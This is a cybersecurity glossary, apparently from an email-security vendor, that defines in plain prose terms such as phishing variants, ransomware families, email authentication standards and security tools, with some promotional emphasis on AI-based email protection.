Cybersecurity Glossary

Account takeover (ATO) is when a hacker successfully takes ownership of one or multiple online accounts.

An advanced persistent threat, or APT, is a type of cyberattack in which one or multiple threat actors gain unauthorized access to your systems or network for an extended period of time without being detected. Typical targets of APTs are large businesses and government organizations, since the scope of their systems is so large that detecting a seemingly small threat goes under their radar. Once an APT occurs, individuals can deepen their access to your systems and cause serious damage. Consequences of a successful APT include loss of sensitive information, intellectual property theft, malware viruses, and total site takeovers.

Also referred to as “double-barreled” phishing, barrel phishing is a more sophisticated form of phishing that involves two emails. The first email—often referred to as the “bait email”—attempts to establish a relationship with the recipient or trick them into believing the sender is a trusted source. Once the recipient’s guard is lowered, they’re sent a follow-up email where the actual phishing occurs, usually in the form of malicious links.

Brand impersonation is a type of email phishing attack where cybercriminals pose as a trusted brand to dupe victims and steal their data. Also known as brand spoofing, this cyberattack uses an email that looks like it’s from a recognizable brand to trick recipients into clicking a link or downloading an attachment containing malware. Some of the most impersonated brands include Facebook, Microsoft, Google, and PayPal.

A browser exploit refers to malicious code that is executed without a user’s knowledge to gain access to a computer system. It often targets vulnerabilities within web browsers or plugins.

Browser isolation is a security control that isolates web activity from other applications and processes running on the same device. This helps limit the potential damage caused by malicious websites and drive-by downloads.

Browser security refers to measures taken to secure web browsers from attack or intrusion by cybercriminals, including phishing, spear-phishing, and malware attacks. It includes installing anti-malware software as well as configuring browser settings such as disabling plug-ins, enabling pop-up blockers, etc.

Brute force refers to an attack that aims to gain unauthorized access to an account or encryption key. The attack method uses a trial-and-error approach in which hackers attempt to guess password combinations. Brute force attacks can be used to launch a host of malicious activities, such as harvesting data, spreading malware and ransomware, diverting website traffic, and more. While brute force attacks have existed for many years, they’ve grown more sophisticated with the aid of software that enhances the speed and accuracy of this kind of attack. Common protections against brute force attacks include anti-virus software, anti-phishing solutions, anti-malware and ransomware solutions, good cyber hygiene, and user awareness training.

Business Email Compromise (BEC) is a type of spear phishing attack in which a person impersonates a well-known contact of an employee in an attempt to have them transfer funds, reveal sensitive information, or carry out other harmful actions.

CEO fraud is when a hacker impersonates a senior executive within an organization and attempts to dupe employees into providing sensitive company information, sharing account credentials, or transferring funds.

Click-jacking is a type of cyberattack where malicious code is embedded in a website to deceive a user into clicking a button, link, or other element that results in unintended actions or functions being performed. Click-jacking can force users to unknowingly download malware, divulge account credentials, and more.

Clone phishing uses a duplicate or “clone” copy of an email from a trusted source to deceive the recipient. Instead of creating their own email, the hacker duplicates an existing email from a well-established brand to lure their victims. The email is typically either one the recipient has received in the past or at least isn’t surprised to be receiving. The legitimacy of the cloned email tricks recipients into clicking on malicious links or giving up sensitive information.

A cloud access security broker, or CASB, protects companies using cloud-hosted services and applications. CASBs act as a firewall between enterprise users and their cloud applications—managing and protecting the data being accessed and stored there. Cloud access security brokers can either be on-premise or cloud-based and fill any gaps in security to allow a company’s security policy to extend beyond their own infrastructure to cloud-based applications.

Cloud email—such as Gmail—is email hosted by a cloud-based email service provider. It’s an alternative solution for organizations that don’t want to host email services on their own infrastructure. Since cloud email is stored and hosted in the cloud, its major benefit is the ability for users to access their email from anywhere—without needing to connect to a server.

Cloud email security supplements, or CESSs, provide additional security measures specific to phishing-related attacks. They are typically utilized in particular use cases where organizations are regularly facing specific yet sophisticated threats that are hard to detect. CESSs are beneficial for organizations that need real-time scanning of inboxes or require enhanced detection and remediation methods for email-related cyberattacks. With the right CESSs in place, organizations can benefit from an additional layer of security that specifically addresses threats that are prevalent to their business.

Cloud security, also referred to as cloud computing security, is the discipline of protecting cloud-based systems from cyberthreats, including their data, infrastructure, and applications. Cloud security encompasses a collection of technology solutions, processes, and controls used by cloud service providers to defend against internal and external threats. With the growing popularity of cloud services and applications, cloud security, particularly for enterprises, has increased in importance.

Computer Vision is a field of computer science that uses Artificial Intelligence (AI) to understand visual data (imagery). If AI is used to “think” by analyzing and interpreting data inputs, Computer Vision is used to “see” by analyzing and interpreting visual inputs.

Content disarm and reconstruction (CDR) is a form of web content filtering which scans downloaded files for threats before they reach the endpoint device. The process removes any potentially malicious elements from the file while still preserving its original functionality.

A cousin domain—also referred to as a lookalike domain—is a domain that deceptively resembles the name of another website. Cousin domains use common typos (www.facabook.com) or numbers (goog1e.com) in an effort to trick fast-moving Internet users into thinking they’re on a legitimate website. Once users land on the cousin domain, the hackers begin carrying out phishing attacks on the user.

Credential harvesting is a specific type of cyber attack targeting login credentials such as usernames and passwords. Popular credential harvesting tactics include email phishing, malicious websites, or browser extensions. Once the credentials are obtained, cybercriminals then use them to gain access to sensitive information—leaving organizations susceptible to security threats and fraudulent activity.  

Credential stuffing is a form of cyberattack that involves using breached login credentials to try to access other unrelated services and applications. For example, if there is a data breach at a major retail chain, hackers may use the credentials obtained in the breach for attempted logins for a financial services application.

A cross-site scripting (XSS) attack is a technique in which attackers inject malicious code—most often JavaScript—into legitimate websites. Hackers take advantage of a vulnerability in the targeted web application to execute a malicious script on the user's device. XSS attacks can be used to spread malware, harvest credentials, carry out phishing attacks, and more.

Cryptojacking is a type of cyberattack in which hackers infiltrate a user’s device and secretly use computing resources to mine cryptocurrencies. Cryptocurrency mining demands significant computing power, but offers hackers the reward of earning cryptocurrency or traditional currency. While cryptojacking occurs without the knowledge of the victim, it often diminishes the performance of the infected device, causing it to run slowly, crash, or heat up. Cryptojacking continues to rise in popularity with the growth of digital currencies. Cryptojacking schemes often begin with a phishing email.

CryptoLocker is a ransomware variant and type of malware that targets Windows computers and encrypts files. As with other forms of ransomware, once an infection takes place, hackers demand a ransom in exchange for a decryption key. CryptoLocker first arrived on the scene in 2013. Delivered via phishing emails, hackers dupe victims into downloading malicious attachments containing Trojans. Defenses against CryptoLocker include firewalls, anti-virus programs, anti-phishing solutions, anti-malware solutions, and user awareness training.

A cyberattack is any attempt by nefarious individuals to target an organization’s IT infrastructure, networks, systems, or devices to either steal, expose, or destroy information or assets. When carried out successfully, cyberattacks impact your business in more ways than one. From increasing the likelihood of a future cyberattack to putting your organization in legal jeopardy, cyberattacks have the ability to inflict serious harm across your organization if left unchecked.

Some of the more common types of cyberattacks include denial-of-service (DoS), man-in-the-middle (MITM), business email compromise (BEC), phishing, spear phishing, ransomware, and DNS spoofing. In order to prevent cyberattacks, it’s important to educate your staff on cybersecurity best practices. Utilizing AI-based cybersecurity solutions can also enhance your security posture and make it easier to detect and neutralize threats before they cause damage.

Cybersecurity is the collection of technologies, best practices, and processes used to protect your IT infrastructure, systems, networks, and devices from harmful threats. It relies on employees to know how to detect and address cyberattacks, as well as sophisticated technologies that make it more difficult for individuals to infiltrate your IT infrastructure.

With a global workforce that has become increasingly remote, cybersecurity has been a pressing concern for many organizations. Effectively securing devices and networks that are outside an organization’s IT infrastructure is crucial in order to fortify your cybersecurity measures and keep your organization out of harm’s way.

Considering the average data breach costs organizations $3.8 million (USD) globally, the need for effective cybersecurity solutions has never been more important. As cyberattacks become increasingly sophisticated and harder to detect, organizations must lean on AI-based cybersecurity solutions to automate the prevention, detection, and remediation of cyberattacks in order to effectively curb threats before it’s too late.

Data Loss Prevention (DLP) is the process of protecting sensitive data from getting lost, destroyed, or exfiltrated through unwanted and unauthorized means. DLP refers to a set of tools and processes used to protect confidential and critical data through protective measures such as alerts, encryption, and continuous monitoring. DLP solutions oversee activity on networks, endpoints, and cloud applications. They’re also used for reporting and compliance, as well as incident response.  

Data exfiltration is the deliberate extraction of sensitive data by an external organization without permission. Data exfiltration occurs after an initial compromise and is often used in combination with phishing and other email-borne attacks. Common data exfiltration attacks begin with phishing emails to infiltrate the organization’s system or when an insider emails sensitive data to outside sources without approval. This technique is also commonly used in ransomware attacks for double extortion. The best line of defense against data exfiltration is AI-powered collaborative email security, which includes advanced incident response capabilities, threat detection, user awareness training, and a continuous improvement cycle. 

Data leakage is the unauthorized exfiltration or transfer of data from a computer system or network, typically via unsecured channels such as email, USB devices, or cloud storage. It can lead to data breaches and other security risks.

Data privacy refers to the ability for online users to control their personal information, including to what extent it gets shared with third parties. This personal information is tracked and stored by websites and online applications to carry out services, such as personalizing user experiences. Because this information could be exploited by cybercriminals and other third parties, laws such as General Data Protection Regulation (GDPR) and Health Insurance Portability and Accountability Act (HIPAA) govern data privacy. They regulate the kinds of personal information third parties can collect, ensure proper safeguards are implemented to protect personal information, and hold third parties accountable to rules and standards.

A denial-of-service (DoS) attack, also referred to as a mail bomb, uses a mass-mailing technique to overwhelm an email address in an effort to shut down a network. The DoS attack is carried out using botnets to flood a recipients’ inbox with millions of spam emails and block service for all users. While DoS attacks don’t typically result in compromised data, they’re fairly simple to carry out and can result in major headaches for companies on the receiving end of such attacks. Organizations can minimize their risk of a DoS attack by having highly sophisticated network infrastructure security.

Display name spoofing uses the display name of email senders to deceive recipients. By using a real name that is known to the recipient, hackers attempt to trick users into divulging sensitive information or downloading attachments infected with malware. Display name spoofing is one of the most common forms of email spoofing and is especially effective on mobile devices, since email clients often hide the sender’s email address. Protection against display name spoofing attacks includes security awareness training and email security that analyzes emails for display name and email address consistency.

A distributed denial-of-service (DDos) attack is a supercharged version of a traditional denial-of-service (DoS) attack. It leverages multiple computers to overwhelm a network, enabling attacks to be deployed faster and at larger traffic volumes. Not only can this be more catastrophic to the network attacked, but the use of multiple botnet locations for execution make it far more difficult to trace its origins.

DomainKeys Identified Mail (DKIM) is an email verification process that validates with a digital signature that an email came from the intended organization. When activated, DKIM validation happens automatically at the server level before ever reaching the recipient, authenticating the incoming email so the receiver knows it’s legitimate and not malicious.

Domain-based Message Authentication, Reporting and Conformance (DMARC) is an email authentication protocol that prevents unwanted parties from sending spam or phishing emails to an organization.

Working in tandem with DKIM and SPF, DMARC enables companies to publish a DMARC policy into a DNS record, thus establishing a policy for how to handle emails that fail both SPF and DKIM.

DNS spoofing, short for Domain Name System spoofing and also referred to as DNS cache poisoning, is a type of cyberattack in which domain name servers are compromised via fake data to redirect users to harmful websites. Common targets for DNS spoofing attacks are places with unprotected public Wi-Fi, as hackers have an easy time abusing these DNS servers’ weak security posture and introducing fake data. DNS spoofing attacks come in a variety of shapes and sizes—including man-in-the-middle attacks and DNS server compromise—making it increasingly difficult for organizations to effectively detect and prevent them.

Document object model (DOM) reconstruction is a form of remote browser isolation (RBI) that attempts to remove malicious content from webpage elements—such as HTML and CSS. Once removed, the solution reconstructs the webpage elements and delivers it to the user’s local endpoint. DOM reconstruction is an alternative to the pixel pushing and network vector rendering (NVR) methods of RBI. While solving issues of latency, DOM reconstruction presents security and usability risks.

Domain spoofing is a phishing attack where cybercriminals use a fake version of a legitimate email address to scam users. Unlike display name or close cousin spoofing, domain name spoofing replicates the legitimate email address exactly. This form of email spoofing is less common because of Sender Policy Framework (SPF) and Domain Keys Identified Mail (DKIM). Once SPF and DKIM are incorporated into DNS settings, they prevent unauthorized use of domain names for spoofing attacks.

A drive-by download is a type of malicious software that is downloaded to a user's computer without their knowledge or consent. This type of download often occurs when a user visits an infected website or clicks on an infected advertisement. The malicious software can be used to steal data, hijack the user's computer, or gain control of their system. It can also be used to spread other types of malware, such as ransomware or spyware.

EDR, or endpoint detection and response, is technology used for endpoint protection. EDR systems detect security threats by monitoring endpoint activity for suspicious behaviors, block and contain malicious threats, and facilitate incident response and investigation activities. Organizations often use EDR systems as part of a multi-faceted approach to cybersecurity, pairing the technology with other systems such as XDR (Extended Detection and Response), SIEM (Security Information and Event Management), and AI threat detection and response solutions.

Email archiving is the process of preserving and storing email communications in a manner that is safe, organized, and accessible for future use. Organizations depend on email archiving for a variety of reasons, including compliance with laws, internal audits, potential litigation, and more. Safe and effective email archiving requires email security to protect sensitive email communications against cyberthreats and bad actors.

Email filtering refers to the classification of both inbound and outbound email traffic based on certain criteria. Email filtering analyzes email content for potential spam or phishing risks, and ensures those emails are properly classified and placed in the appropriate folders, such as spam or junk. Email filtering ensures malicious emails don’t end up in an individual’s main inbox, which in turn lowers the likelihood of a successful cyberattack.

Email gateways, or secure email gateways (SEGs), are used to detect and block malicious email content before it reaches a corporate email server. While email filtering sorts through nefarious content once it reaches an individual’s inbox, email gateways prevent possible phishing attacks from reaching a mail server in the first place.

Secure email gateways rely on signature and reputation-based detection to protect against known email threats. While once regarded as a safe defense against cybercriminals, secure email gateways are vulnerable to many modern threats, including those that remain unknown. They also require MX record changes that hackers can see via an MX record query. In the event a malicious email bypasses the gateway, SEGs also can’t remediate or remove the threat post-delivery.

A superior alternative to email gateways are cybersecurity solutions that offer predictive defense against known and unknown threats. These solutions rely on artificial intelligence (AI) to conduct behavioral and heuristic analyses of malicious emails, detect anomalies and abusive patterns, and remediate email threats post-delivery.

Email scams such as phishing, spear phishing, and malware attacks deceive recipients with malicious intent. Email scams are designed to defraud an individual or organization by making them believe the information or request contained in the email is legitimate. These scams attempt to coerce potential victims into divulging sensitive information, completing a compromising request (e.g., transferring funds to a fraudulent account), or downloading a file infected with malware. Email scams are the most popular type of cyber threat and the top cause of initial compromise. Protecting against email-based attacks requires advanced email security.     

Email security refers to the standards, best practices, and technologies used to protect personal and corporate email accounts and communications.

Email spoofing is a technique used in phishing and spear phishing attempts in which a person attempts to pass off a fraudulent email as a legitimate one that closely resembles a message an individual would typically receive.

Emotet, or Emotet malware, is a type of malware that was originally designed to compromise financial data via banking trojans. But today, Emotet has evolved into a major threat that targets all types of organizations. After avoiding anti-virus detection software and infiltrating a user’s device or network, Emotet malware infects the original device, before sending itself via spam emails to a user’s contact list.

Typically, Emotet malware is transferred via email links that appear to be authentic. Once a user clicks the nefarious link, the Emotet malware is automatically downloaded onto the user’s device. Once Emotet has been downloaded, a user can experience data theft, loss of access to sensitive data, and critical damage to their company’s IT infrastructure as a whole.

Designed to evade detection, Emotet malware is difficult to prevent. Only through the right combination of AI-based cybersecurity measures, such as anti-phishing and anti-malware solutions, and user awareness training can your organization avoid a successful Emotet attack.

Encryption is the process of converting data in its original form, also known as plaintext, into an encoded form that makes it harder for unintended users to understand. This alternative form is known as ciphertext. Encryption is a commonly used technique by organizations that wish to scramble their data and protect it so that only authorized individuals are able to convert the ciphertext into plaintext and interpret the sensitive information.

The two main types of encryption are symmetric encryption and asymmetric encryption. While symmetric encryption only utilizes one secret key, asymmetric encryption utilizes two separate keys for encryption and decryption, respectively.

Encryption is a vital component of cybersecurity, as it keeps sensitive information out of the hands of individuals who either don’t need access to it or plan to expose it. Used to both protect a user’s privacy and secure an organization’s sensitive information, encryption is a simple yet effective way of preventing others from obtaining confidential information.

Endpoint security protects networks from cyberattacks by securing all network entry-points (e.g. laptops, cellphones, etc.). Endpoint security has become increasingly important with the adoption of remote and hybrid work, since there are no longer traditional security perimeters in place. Endpoint security also protects against email-borne threats through incident response and scanning.

GDPR, short for General Data Protection Regulation, is a collection of data privacy laws that establishes guidelines for the handling of personal information of people who live in the European Union. Approved in 2016, GDPR aims to ensure individuals have control over their personal data, and holds organizations accountable for how they collect and process personal information.

For companies that collect, process, or store personal data, adhering to GDPR standards is vitally important and should be kept top of mind. Penalties for companies that do not adhere to GDPR guidelines include being fined up to €20 million or 4% of worldwide annual revenue for the preceding financial year, whichever is higher.

Graymail refers to email content that an individual opted in to receive at one point, but no longer wants. These emails come from legitimate sources and usually promote newsletter, promotions, or educational content to keep the subscriber up to date on their business. While graymail doesn’t inflict the same harm as a cyberattack, they can begin to clutter your inbox over time and make it more difficult to spot emails that are actually nefarious.

A heuristic analysis of email uses algorithms to recognize malicious patterns in emails, email attachments, or webpages. Heuristic analysis applies both practical and problem-solving methods to cybersecurity, using a set of guidelines that’s continually optimized. While signature-based protection relies on the characteristics of known threats, heuristic analysis can detect threats based on behavior. In order to be most effective, new heuristic rules need to be created regularly in an effort to thwart the latest threats. 

A honeypot is a cybersecurity tool used to trick cybercriminals into believing that they’ve gained access to an organization’s actual IT infrastructure. A honeypot is a recreation of an organization’s actual systems or networks that acts as a decoy for cybercriminals and is used to attract cyberattacks.

Honeypots can be helpful in keeping cybercriminals’ attention away from your actual assets, in addition to providing insightful information into the effectiveness and security of your legitimate IT infrastructure. Setting up a honeypot can help you glean information on the way cybercriminals operate, as well as provide you with details on where there might be gaps in your current cybersecurity measures.

Identity and Access Management (IAM) is a system of processes and technologies that enables organizations to securely manage the digital identities of their users. This includes controlling their access to systems, applications, and data. IAM solutions provide organizations with the ability to authorize and authenticate users and to audit and control user activities.

Incident response is how an organization responds to a successful cyberattack or breach. This includes minimizing the negative impact, addressing the root causes, and preventing further damage and cyberattacks in the future. Incident response works to limit both the tangible repercussions of a cyberattack, such as costs and time, as well as minimize damage to elements like brand reputation and consumer trust.

An insider threat is typically a current or former employee of an organization that has the means to cause damage to the organization’s internal systems or leak sensitive information. Insider threats can also be former contractors, vendors, or partners who are able to access the organization’s sensitive data. An effective way to avoid insider threats is to ensure people who no longer require login credentials have their access to internal systems and data platforms revoked.

Keylogger, also referred to as keystroke logging, is a tool used by cybercriminals to track and record a user’s computer activity in order to gain access to sensitive information. A form of spyware, keyloggers record every keystroke made by a user. Cybercriminals use keyloggers to steal user credentials, record sensitive information such as credit card numbers, track online browsing activity, and more. Keyloggers are often used to carry out malicious activities and can be difficult to detect, but with effective user awareness training and sophisticated cybersecurity solutions in place, your organization can minimize the likelihood of keyloggers exploiting your users.

Machine Learning is a subset of Artificial Intelligence (AI) to enable machines to simulate intelligent human behavior as it relates to learning and decision making. Machine Learning algorithms learn to make observations, classify information, and uncover patterns. Over time, the insights gleaned from this process help algorithms become incredibly proficient at their respective tasks. Many email security programs rely on Machine Learning to perform real-time analysis of emails and protect against phishing attempts.

Mail-focused security orchestration, automation, and response (M-SOAR) is a subset of SOAR specifically for email. M-SOAR technology enables organizations to automate their incident response and streamline the workflow for triaging and remediating threats. M-SOAR relies on a combination of AI and human input to identify email threat intelligence and respond quickly to phishing, spear phishing, and malware attacks.

Malicious email attachments contain hidden malware or viruses in an attempt to gain access to the recipient’s system and exploit them. Cybercriminals use convincing email content to deceive the reader into clicking the malicious email attachment, which often contains malware or phishing links. The best line of defense against malicious email attachments is advanced email security with automatic and assisted remediation and the ability for admins to inspect malicious attachments without risk of exposure.

Malvertising is the malicious use of online advertising to spread malware or phishing links, with the intent of infecting a user's computer with malware or stealing personal data. Malvertising can exploit users even when they don’t click it and result in drive-by downloads, redirects to malicious websites, and more.

Malware, short for malicious software, is any firmware or software that’s designed to infect or steal information from one or multiple computer systems.

Like man-in-the-middle (MiTM) attacks, man-in-the-browser (MiTB) attacks focus on intercepting calls between an executable application (EXE) and its libraries (DLL). MiTB deploys a Trojan Horse to capture and manipulate calls made from the browser to its security mechanisms. Most commonly, MiTB attacks are used to facilitate financial fraud and modify transactions without alerting the user.

A man in the middle attack (MitM) is when someone intercepts sensitive information or data by either eavesdropping on a conversation or data transfer between two parties or impersonating one of the parties. A person carrying out a MitM attack may be undetectable to the legitimate participants, which enables them to obtain sensitive information or pass on malicious links without triggering any red flags.

A managed security service provider (MSSP) is a type of managed service provider specializing in cybersecurity. MSSPs manage and monitor all facets of cybersecurity for organizations, replacing the need to manage network security in-house. 

Managed service providers (MSPs) are third-party organizations hired by companies to manage one or more of their IT functions. MSPs offer a range of services, including IT consulting, cloud services, remote monitoring and management of information systems, and security services. Managed security is one of the fastest growing service areas for MSPs, as cyberattacks on businesses continue to sharply rise.

A message transfer agent (MTA) is software that is responsible for delivering email from the sender’s device to the recipient’s. MTAs deal with the complexities of deliverability at scale from scheduling, queuing, bouncing and more. In the past, MTAs were mainly managed by third-party vendors but the newer, customizable MTAs give service providers complete control over the process and eliminate the need to outsource MTAs.

MFA bypass is a security vulnerability that allows an attacker to bypass multi-factor authentication (MFA) and gain access to a user's account or device without needing the second or subsequent factor of authentication.

Multi-factor authentication (MFA) is a security measure that uses at least two different login methods to verify a person’s identity. As opposed to logging in via username and password, MFA uses tools such as security questions, unique codes sent to phones or email addresses, or fingerprint technology to further secure an individual’s account. MFA helps organizations protect individual corporate accounts and defend against unauthorized access, data breaches, and more.

A mail exchange (MX) record exists within your DNS (Domain Name System) and is responsible for the delivery of emails to your email server. The MX record establishes which mail server to route emails to on behalf of a domain. MX records are an important security vulnerability with traditional email security solutions. Secure email gateways (SEGs) require you to update your MX records to match that of the SEG. Because MX records are publicly visible, this alerts cybercriminals to the type of email security you are using—making you more vulnerable to a bypass attempt by hackers.

Natural Language Processing (NLP) is a field of computer science that uses Machine Learning to teach computers to process and understand human language. Natural Language Processing analyzes text and is used in cybersecurity to detect threats. NLP algorithms can identify the urgent language used in social engineering attempts, as well as the flag words and phrasing typically used in spear-phishing attacks, also known as business email compromise (BEC).

Network vector rendering (NVR) is a type of remote browser isolation (RBI) that leverages Skia, the graphics library that works across many browsers, hardware, and software platforms. Unlike pixel pushing or DOM reconstruction, NVR streams Skia commands—rather than website code—to the user’s local device. While less costly than some pixel pushing solutions, NVR leaves the risk of exposure to cyberthreats as it uses partial web isolation.

Also known as a man-in-the-browser (MiTB) attack, an on-path browser attack deploys a Trojan Horse to capture and manipulate calls made from the browser to its security mechanisms. MiTB attacks most commonly facilitate financial fraud without alerting the user to nefarious activity.

Patch management is an essential part of any cybersecurity strategy and involves running regularly scheduled system updates—or patches—to address vulnerabilities or new cybersecurity threats. Automated patch management software streamlines this process by automatically updating the software on a regular cadence to reduce down time and ensure organizations have the most updated cybersecurity protection available.

Personally identifiable information, or PII, is information that can be used to identify an individual. PII can include direct identifiers, such as passport information, driver’s license information, or birth certificates, or it can be made up of a variety of indirect identifiers, such as race, occupation, and location. In the wake of increasing cyberattacks that have jeopardized countless individuals’ sensitive information, measures have been put in place to ensure PII is being safely protected and secured in order to keep identities confidential and secure.

Petya is a type of ransomware that spreads through phishing emails and infects the master boot record of Microsoft Windows-based devices. A user that clicks a malicious link containing Petya ransomware enables the virus to overwrite the master boot record in order to encrypt the user’s hard drive. Once encrypted, users are required to enter an encryption key, typically obtained for a ransom, in order to retrieve their data. After Petya first emerged in 2016, a new variant surfaced called NotPetya, which made headlines for crippling business operations worldwide. Unlike the original form of the virus, NotPetya uses several propagation techniques to quickly spread within and across networks. In order to protect your organization against Petya and its variants, it’s important to educate your employees on phishing email detection to avoid potential compromise.

Pharming is a type of cyberattack that redirects users away from a trusted website to a fraudulent one. Through malicious code already embedded on a user’s device, pharming pushes website traffic towards fake sites, where users provide sensitive information for cybercriminals to harvest.

Similar to phishing attacks, a pharming cyberattack relies on a user not knowing that they’ve been redirected to an illegitimate site so that they freely provide personally identifiable information (PII) or login credentials without realizing foul play. As is the case with many cyberattacks, pharming prevention starts with familiarizing your employees with suspicious-looking emails and websites so that they can detect pharming attempts before handing over sensitive information.

Phishing is the most common form of social engineering carried out by email. Unlike cyberattacks on systems and software, it requires little to no hacking expertise, making it a quick and easy way for cybercriminals to get access to a business’s most sensitive data.

Phishing awareness training works to educate employees on how to detect, prevent, and report phishing attempts in order to protect themselves and their organization. Through computer-based training, simulated phishing exercises, and classroom-style training, phishing awareness training sheds light on how cybercriminals operate, and ensures that when employees are faced with a real phishing attempt, they’re able to detect it before any harm is done. Phishing awareness training is crucial for organizations that need their employees to know the telltale signs of a phishing attempt, and should be carried out on a regular basis to ensure individuals know how to prevent phishing attacks.

As its name suggests, ransomware is a type of malware that blocks a user’s access to company files until a ransom is paid.

Cybersecurity remediation refers to your organization’s ability to quickly and effectively address cyberattacks after they’ve occurred. Whether it’s remedying a data breach, malware attack, or security lapse, cybersecurity remediation seeks to detect and neutralize attacks before they inflict more harm. This is important to ensure that cyberattacks don’t cause further damage to your IT infrastructure after they occur. Successful cybersecurity remediation relies on continuous visibility of your systems, networks, and devices, as well as the proper upkeep of software and hardware to ensure they’re equipped with the latest security patches.

A remote access Trojan, or RAT, is a type of malware that enables a cybercriminal to fully take control of a user’s device remotely in order to carry out a variety of malicious actions. Typically downloaded as seemingly innocuous files or programs, RATs have become increasingly difficult to detect and remove from a user’s device. Once an RAT attack has been carried out, the cybercriminal can access sensitive data, make payments, delete files, and more.

Sandbox security is a form of cybersecurity that uses an isolated environment (sandbox) to analyze a potential threat for malicious behavior. The sandbox, which mimics an actual operating environment, safely executes the suspicious code without risk to the true network. Unlike signature- or reputation-based solutions, sandbox security protects against unknown threats, not only those with a recognized fingerprint or blacklisted IP address. Despite this additional layer of protection, sandbox security presents limitations. For instance, phishing emails may deliver sophisticated, environmentally aware malware, which can detect sandboxes, go dormant when analyzed, and execute malicious code upon reaching the target environment.

A secure email gateway (SEG) is an email security solution designed to block malicious emails from entering an organization’s email server. SEGs inspect incoming and outgoing email using a gateway that sits outside the organization’s internal server. SEGs use reputation and signature-based scanning to filter potentially malicious emails. Because the majority of cyberthreats are unknown to reputation or signature-based detection methods, SEGs are limited in their ability to detect threats, and provide no protection for insider attacks.

Security awareness training educates employees on how to prevent and mitigate cyberattacks.

Security Information and Event Management, also known as SIEM, is a collection of technologies and services designed to improve the security of an organization’s IT infrastructure. Using SIEM tools, organizations can better track, manage, and analyze security threats while ensuring compliance across their systems and networks. Common functionalities of SIEM tools include:

• Log collection of all activities within an infrastructure
• Real-time analysis of security events
• Incident management
• Centralized dashboard for security monitoring

With the right combination of SIEM tools, organizations can consolidate large amounts of security-related information and analyze it quickly and efficiently. This in turn enables them to proactively monitor security threats and neutralize them before any harm is done.

Sender Policy Framework (SPF) is used to authenticate email senders and weed out individuals attempting to send emails on behalf of your domain. SPF is an effective email-authentication method that enables an organization to only permit authorized mail servers to send emails. This ensures individuals receiving emails can be confident that the content is from a trustworthy source.

Sendmail is a server application that enables organizations to send email using the simple mail transfer protocol (SMTP). Sendmail facilitates the transfer of outgoing email messages from the sender to the recipient, including authenticating messages and also queuing them in the event the recipient is not available immediately. Sendmail is often combined with other email applications that enable email users to receive messages, since sendmail can’t perform this function.

Shadow IT is the use of information technology systems, devices, software, applications, and services without approval of the IT department. Shadow IT has become increasingly common and problematic for organizations in recent years, with cloud computing making it easier for users to engage in this practice. Shadow IT presents significant cybersecurity risks, including compromised devices, data breaches, regulatory violations, and more.

Simple mail transfer protocol (SMTP) enables the transmission of emails from one server to another, allowing emails to be sent and received. SMTP is the preferred protocol used by most major email clients—Google, Yahoo, Apple Mail, etc.—and is seen as the networking standard. SMTP does not have any native security features so it’s susceptible to attacks if not paired with the right email security tools.

Smishing is a form of phishing that uses text messaging to launch a malicious attack. Hackers impersonate a brand and send victims a text message to induce them to tap a malicious link or divulge personal information such as social security numbers or credit card information. The rise of smishing follows the growth of smartphones and popularity of texting as a form of communication. Defense against smishing attacks starts with user awareness training.

Social media threats are attacks carried out by cybercriminals in order to compromise an individual’s personal information. Given the widespread use and popularity of social media in today’s world, these platforms are effective vehicles for social engineering attacks. Cybercriminals will often impersonate a well-established brand or person to trick individuals into handing over sensitive data. This can lay the foundation for a larger phishing, social engineering, or malicious attack. For organizations, it’s important to educate employees on the prevalence of social media threats to ensure their online activities don’t pose a cybersecurity risk to themselves or the company.

Spam email is unsolicited and often unwanted messages sent via email to an individual. Spam emails are typically sent out to a mass audience via botnets. While often non-malicious, spam emails can contain malware or ransomware that triggers when an individual engages with the email content. However, spam email is usually distributed for email marketing purposes. An anti-spam engine can help organizations automatically detect and block spam emails.

A form of social engineering, spear phishing is a malicious email that impersonates an individual for the purpose of tricking a recipient into completing a desired action—typically financial in nature. Often, a hacker will impersonate a victim’s acquaintances, such as colleagues, executives, clients, or vendors.

Supply chain security is an essential component of supply chain management that works to mitigate threats, both in the real world and in cyberspace. Supply chain attacks have risen in recent years, and occur when a hacker infiltrates your IT infrastructure to access sensitive information. Properly securing your supply chain from cyberthreats is imperative in order to keep sensitive data secure, as well as avoid financial losses and delivery inefficiencies.

Supply chain security minimizes the likelihood of cybercriminals taking over your network. The SolarWinds breach that occurred in December 2020 should be looked at as a cautionary tale for organizations that handle large volumes of data. The attack impacted 18,000 government and private networks and compromised multiple supply chain layers. For those that provide software or hardware to their clients, implementing effective supply chain security solutions is a must in today’s world.

Threat intelligence is the collection of data and best practices used to understand the motives, behaviors, and tactics of cybercriminals. While no one wants to fall victim to a cyberattack, the information gleaned from a nefarious attempt can be used to prevent future threats through threat intelligence. Collecting, processing, and analyzing data regarding cyberattacks enables your organization to respond more quickly and effectively to threats in the future, and ensures data-driven decisions are being made to inform cybersecurity measures and best practices.

A URL analysis examines web addresses for validity using key indicators like IP information, proxy checks, and sandboxing. Conducting a URL analysis of emails is an important line of defense against cybersecurity threats. Best-in-class email security systems conduct URL analysis in real-time, following URL redirects and other obfuscation techniques. 

Vishing is a form of phishing that uses phone calls as the attack vector. During a vishing attack, scammers call the victim and pose as representatives from an organization, often a financial or government institution. Scammers then use social engineering tactics to get victims to take action over the phone, such as divulging account credentials or financial information. User awareness training about how to spot and respond to a vishing attempt is an effective form of defense.

A virtual private network (VPN) is technology used to extend the protections of a private network across a public network, in order to safely send and receive data. A VPN establishes a secure, encrypted connection between a user’s computer and the internet. The shift to remote work has led to an increase in the number of organizations using VPNs to provide employees with secure access to internal networks. This has also led to an increase in cybercrime involving VPNs, with hackers targeting vulnerabilities to launch ransomware and other malicious attacks.

Wannacry Ransomware is a type of ransomware worm that can quickly infect many devices and encrypt sensitive information. After critical files have been encrypted, cybercriminals will then demand a ransom to decrypt the compromised data. Wannacry Ransomware came onto the scene in 2017, when computers all over the world running Windows were compromised via network vulnerabilities and users were asked to make ransom payments in the Bitcoin cryptocurrency. Wannacry Ransomware can spread incredibly fast, making it a major threat to organizations that have potential security gaps in their IT infrastructure.

A web proxy server is a system or router that acts as an intermediary between users and the internet. A web proxy server provides a layer of security that helps prevent cybercriminals from entering a private network. Organizations use proxy servers for a variety of reasons, including controlling what websites employees can access, changing IP addresses and hiding end-user Internet activity from third parties, and improving network performance while saving bandwidth. While web proxy servers help protect against cyberthreats like malware, they still present vulnerabilities. That’s why web proxy servers are most effectively used in combination with other cybersecurity solutions, such as email security.

